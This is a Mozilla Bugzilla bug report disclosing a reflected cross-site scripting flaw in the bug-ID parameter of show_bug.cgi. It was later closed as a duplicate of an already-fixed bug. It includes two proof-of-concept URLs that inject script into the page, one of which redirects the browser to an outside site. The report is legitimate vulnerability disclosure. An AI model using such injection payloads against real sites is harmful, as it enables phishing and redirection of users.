Closed Bug 842096 Opened 11 years ago Closed 11 years ago

Reflected XSS in Bugzilla

Categories

(Bugzilla :: Creating/Changing Bugs, defect)

2.10
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 842038

People

(Reporter: breakthesecurity.com, Unassigned)

Details

Attachments

(1 file)

Attached image bugzilla-xss.jpg
User Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Build ID: 20130201065344

Steps to reproduce:

Hi, I have identified a XSS vulnerability in BugZilla website.  I have try to inject the XSS code in the bug id :

POC 1:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>alert('E Hacking News')</script>&format=1

POC 2:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>document.location="http://www.ehackingnews.com"</script>&format=1


Actual results:

It successfully Executed the injected code.  Hackers can use this vulnerability for social engineering attack including phishing , redirecting malicious site and more.

I have attached the screenshot .


Expected results:

It should have sanitized the ID parameter .  Escape the Special characters from the ID parameter.
This bug has already been reported earlier today.
Assignee: nobody → create-and-change
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Component: General → Creating/Changing Bugs
Product: bugzilla.mozilla.org → Bugzilla
QA Contact: default-qa
Resolution: --- → DUPLICATE
Version: Production → 2.10
Wow, what are the odds that a bug sits latent for something like 8-10 years (more?) and then gets independently reported by two people 12 hours apart?
Flags: sec-bounty?
Everything started from Nokia Bug hunting.  Bug in Nokia site lead to this bugzilla.
breakthesecurity: can you tell us a bit more about this Nokia bug, and how it led you to find this bug?

Gerv
Bug 842038 has been fixed and is now public. Removing the sec flag.
Group: bugzilla-security
Please remove the comment 6, as it leads to bug in lot of high profile sites
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: